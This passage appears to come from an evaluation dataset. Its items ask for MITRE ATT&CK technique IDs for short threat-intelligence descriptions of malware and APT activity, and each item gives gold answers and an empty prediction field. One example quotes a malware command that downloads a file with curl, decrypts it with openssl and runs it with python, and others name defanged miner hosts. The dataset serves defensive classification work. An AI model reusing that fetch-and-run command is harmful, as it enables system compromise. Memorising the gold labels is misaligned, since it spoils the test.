process.\n\t - T1055: Process Injection\n- Text: Whenever winword makes any graphical call, the shellcode executes. This technique to hijack control flow has also been used by other sophisticated attackers such as FinFisher. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1574.013: Hijack Execution Flow - KernelCallbackTable\n\t - T1620: Reflective Code Loading\n", + "input": "NavRAT leverages cmd.exe to perform discovery techniques. NavRAT loads malicious shellcode and executes it in memory.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FatDuke has used \"HKLM\\SOFTWARE\\Microsoft\\CurrentVersion\\Run\" to establish persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Remexi achieves persistence using Userinit by adding the Registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\".\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: Wizard Spider has modified the Registry key \"HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" by setting the \"UseLogonCredential\" registry value to \"1\" in order to force credentials to be stored in clear text in memory.\n\t - T1112: Modify Registry\n", + "input": "Matryoshka can establish persistence by adding Registry Run keys.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DropBook\u2019s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1105: Ingress Tool Transfer\n\t - T1083: File and Directory Discovery\n- Text: Kwampirs collects a list of network shares with the command \"net share\".\n\t - T1135: Network Share Discovery\n- Text: Hildegard has started a monero service.\n\t - T1543.002: Create or Modify System Process - Systemd Service\n", + "input": "SUNBURST had commands to enumerate files and directories.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1555: Credentials from Password Stores\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n", + "input": "LaZagne can perform credential dumping from LSA secrets to obtain account and password information.", + "gold": "- T1003.004: OS Credential Dumping - LSA Secrets", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DCSrv has created Registry keys for persistence.\n\t - T1112: Modify Registry\n- Text: Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: Clambling can deobfuscate its payload prior to execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the \".vnc.lnk\" affix to steal VNC credentials.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n- Text: CosmicDuke collects user credentials, including passwords, for various programs including popular instant messaging applications and email clients as well as WLAN keys.\n\t - T1555: Credentials from Password Stores\n- Text: APT29 has stolen user's saved passwords from Chrome.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "BlackEnergy has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Outlook, and Windows Credential Store.", + "gold": "- T1552.001: Unsecured Credentials - Credentials In Files", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Figure 5: Sample pseudo-HTTP beacon The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command\n\t - T1071: Application Layer Protocol\n\t - T1090: Proxy\n- Text: We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom\u2019s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately.\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1554: Compromise Host Software Binary\n\t - T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n\t - T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness\n- Text: The execution of the malicious PuTTY binary resulted in the deployment of a backdoor to the host. The deployed backdoor is an evolution of the malware family Mandiant tracks as AIRDRY.\n\t - T1218: System Binary Proxy Execution\n", + "input": "Lucifer has used UPX packed binaries.", + "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rover automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. Rover also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.\n\t - T1020: Automated Exfiltration\n- Text: Another tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g. hxxps://185[.]225[.]69[.]69/) and logs the HTTP response to a plaintext log file (e.g. loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file\n\t - T1119: Automated Collection\n- Text: After that, stage 2 payloads are still retrieved as Bitmap (BMP) images that use Least Significant Bit (LSB) Steganography to hide the real payloads. These images appear normal in image viewers\n\t - T1001.002: Data Obfuscation - Steganography\n", + "input": "When a document is found matching one of the extensions in the configuration, TINYTYPHON uploads it to the C2 server.", + "gold": "- T1020: Automated Exfiltration", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection\n\t - T1489: Service Stop\n- Text: TinyZBot can disable Avira anti-virus.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: LitePower can identify installed AV software.\n\t - T1518.001: Software Discovery - Security Software Discovery\n", + "input": "EKANS stops database, data backup solution, antivirus, and ICS-related processes.", + "gold": "- T1489: Service Stop", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FIN5 has cleared event logs from victims.\n\t - T1070.001: Indicator Removal - Clear Windows Event Logs\n- Text: UNC2452 used \"AUDITPOL\" to prevent the collection of audit logs.\n\t - T1562.002: Impair Defenses - Disable Windows Event Logging\n- Text: Turla has used WMI event filters and consumers to establish persistence.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n", + "input": "SynAck clears event logs.", + "gold": "- T1070.001: Indicator Removal - Clear Windows Event Logs", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike can deliver Beacon payloads for lateral movement by leveraging remote COM execution.\n\t - T1021.003: Remote Services - Distributed Component Object Model\n- Text: As soon as the user enabled the macro, a robust Visual Basic Application (VBA) script began to execute. First, it would query Windows Management Instrumentation (WMI) to check if any of the following applications were running\n\t - T1047: Windows Management Instrumentation\n- Text: The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest\n\t - T1021.006: Remote Services - Windows Remote Management\n", + "input": "SILENTTRINITY can use `cmd.exe` to enable lateral movement using DCOM.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: dsquery can be used to gather information on user accounts within a domain.\n\t - T1087.002: Account Discovery - Domain Account\n- Text: Chimera has used \"net localgroup administrators\" to identify accounts with local administrative rights.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n- Text: Bazar can identify administrator accounts on an infected host.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "During Operation CuckooBees, the threat actors used the `dsquery` and `dsget` commands to get domain environment information and to query users in administrative groups.", + "gold": "- T1087.002: Account Discovery - Domain Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bundlore can persist via a LaunchAgent.\n\t - T1543.001: Create or Modify System Process - Launch Agent\n- Text: XCSSET uses the ssh launchdaemon to elevate privileges, bypass system controls, and enable remote access to the victim.\n\t - T1543.004: Create or Modify System Process - Launch Daemon\n- Text: AppleJeus has loaded a plist file using the \"launchctl\" command.\n\t - T1569.001: System Services - Launchctl\n", + "input": "macOS.OSAMiner has placed a Stripped Payloads with a `plist` extension in the Launch Agent's folder.", + "gold": "- T1543.001: Create or Modify System Process - Launch Agent", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The script variant of the Helminth Trojan consists of a VBScript and PowerShell script named update.vbs and dns.ps1. We aptly named this variant the script version, as we found another version of this Trojan that we will discuss later in this Appendix\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: BoxCaon can execute arbitrary commands and utilize the \"ComSpec\" environment variable.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh. Based on the config file it uses, it appears to be the Monero Silent Miner. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", + "input": "Exaramel for Windows has a command to execute VBS scripts on the victim\u2019s machine.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has used custom DNS Tunneling protocols for C2.\n\t - T1095: Non-Application Layer Protocol\n- Text: Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.\n\t - T1205.002: Traffic Signaling - Socket Filters\n- Text: Command and control To traverse the firewall, C2 traffic for most TG-3390 tools occurs over ports 53, 80, and 443\n\t - T1571: Non-Standard Port\n\t - T1043: Commonly Used Port\n", + "input": "Misdat network traffic communicates over a raw socket.", + "gold": "- T1095: Non-Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Matryoshka is capable of stealing Outlook passwords.\n\t - T1555: Credentials from Password Stores\n- Text: gathers the victim's IP address and domain information, and then sends it to its C2 server.\n\t - T1016: System Network Configuration Discovery\n- Text: Rising Sun can detect the computer name, operating system, and drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume.\n\t - T1082: System Information Discovery\n", + "input": "PinchDuke gathers system configuration information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: InvisiMole can register itself for execution and persistence via the Control Panel.\n\t - T1218.002: System Binary Proxy Execution - Control Panel\n- Text: Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: The Word document has a malicious macro in it and, when opened by the victim, it will drop and execute a file in a specific folder\n\t - T1204.002: User Execution - Malicious File\n", + "input": "Ember Bear has used control panel files (CPL), delivered via e-mail, for execution.", + "gold": "- T1218.002: System Binary Proxy Execution - Control Panel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT28 has renamed the WinRAR utility to avoid detection.\n\t - T1036: Masquerading\n- Text: Chimera's malware has altered the NTLM authentication program on domain controllers to allow Chimera to login without a valid credential.\n\t - T1556.001: Modify Authentication Process - Domain Controller Authentication\n- Text: P2P ZeuS added junk data to outgoing UDP packets to peer implants.\n\t - T1001.001: Data Obfuscation - Junk Data\n", + "input": "TRITON attempts to write a dummy program into memory if it fails to reset the Triconex controller.", + "gold": "- T1036: Masquerading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: gathers the victim's IP address and domain information, and then sends it to its C2 server.\n\t - T1016: System Network Configuration Discovery\n- Text: APT3 has a tool that can detect the existence of remote systems.\n\t - T1018: Remote System Discovery\n- Text: Egregor can enumerate all connected drives.\n\t - T1049: System Network Connections Discovery\n", + "input": "Turian can retrieve the internal IP address of a compromised host.", + "gold": "- T1016: System Network Configuration Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: WhisperGate can download and execute AdvancedRun.exe to disable the Windows Defender Theat Protection service and set an exclusion path for the C:\\ drive.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq; python /tmp/.info.py The first part of the command downloads an encoded file from a Github page belonging to a user named youarenick\" and saves that file to a hidden file named .info.enc in /private/tmp/. Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.\"\n\t - T1553.001: Subvert Trust Controls - Gatekeeper Bypass\n- Text: PowerSploit reflectively loads a Windows PE file into a process.\n\t - T1620: Reflective Code Loading\n", + "input": "Bazar has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CaddyWiper can work alphabetically through drives on a compromised system to take ownership of and overwrite all files.\n\t - T1485: Data Destruction\n- Text: MURKYTOP has the capability to delete local files.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id\n\t - T1047: Windows Management Instrumentation\n\t - T1490: Inhibit System Recovery\n\t - T1490: Inhibit System Recovery\n\t - T1490: Inhibit System Recovery\n\t - T1047: Windows Management Instrumentation\n\t - T1047: Windows Management Instrumentation\n", + "input": "SDelete deletes data in a way that makes it unrecoverable.", + "gold": "- T1070.004: Indicator Removal - File Deletion\n- T1485: Data Destruction", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Between 2016 and 2020, we have seenScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro. 7] The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movements and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme. 6] In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. 7] In 2020, ScreenConnect/ConnectWise has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: has sent malicious Word OLE compound documents to victims.\n\t - T1559.002: Inter-Process Communication - Dynamic Data Exchange\n- Text: It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file\n\t - T1105: Ingress Tool Transfer\n", + "input": "Gallmaker used PowerShell to download additional payloads and for execution.", + "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Command and Control Infrastructure: Compromised servers, messaging platforms, and cloud service providers to avoid detection\n\t - T1102: Web Service\n- Text: In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom\n\t - T1090: Proxy\n- Text: Bisonal has used a dynamic DNS service for C2.\n\t - T1568: Dynamic Resolution\n", + "input": "Ngrok has been used by threat actors to proxy C2 connections to ngrok service subdomains.", + "gold": "- T1102: Web Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Empire can upload and download to and from a victim machine.\n\t - T1105: Ingress Tool Transfer\n- Text: The Bazar loader is used to download and execute the Bazar backdoor.\n\t - T1104: Multi-Stage Channels\n- Text: For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control. EmPyre is a Python post-exploitation agent built on cryptologically-secure communications and a flexible architecture\n\t - T1059.006: Command and Scripting Interpreter - Python\n", + "input": "Turian can download additional files and tools from its C2.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In 2018 Intezer covered Foudre version 8, which contained a certain sample labeled unknown binary that was not explored in Intezer\u2019s research. In fact, this was a new component \u2014 called Tonnerre \u2014 which was a new step in the evolution of Infy, and contained various functionality absent from Foudre alone.\n\t - T1587.001: Develop Capabilities - Malware\n- Text: For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.\n\t - T1608.002: Stage Capabilities - Upload Tool\n- Text: For C0011, Transparent Tribe hosted malicious documents on domains registered by the group.\n\t - T1608.001: Stage Capabilities - Upload Malware\n", + "input": "For C0010, UNC3890 actors used unique malware, including SUGARUSH and SUGARDUMP.", + "gold": "- T1587.001: Develop Capabilities - Malware", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: KOCTOPUS has been distributed as a malicious link within an email.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: When the malicious RTF document is opened, two things happen that allow the attacker 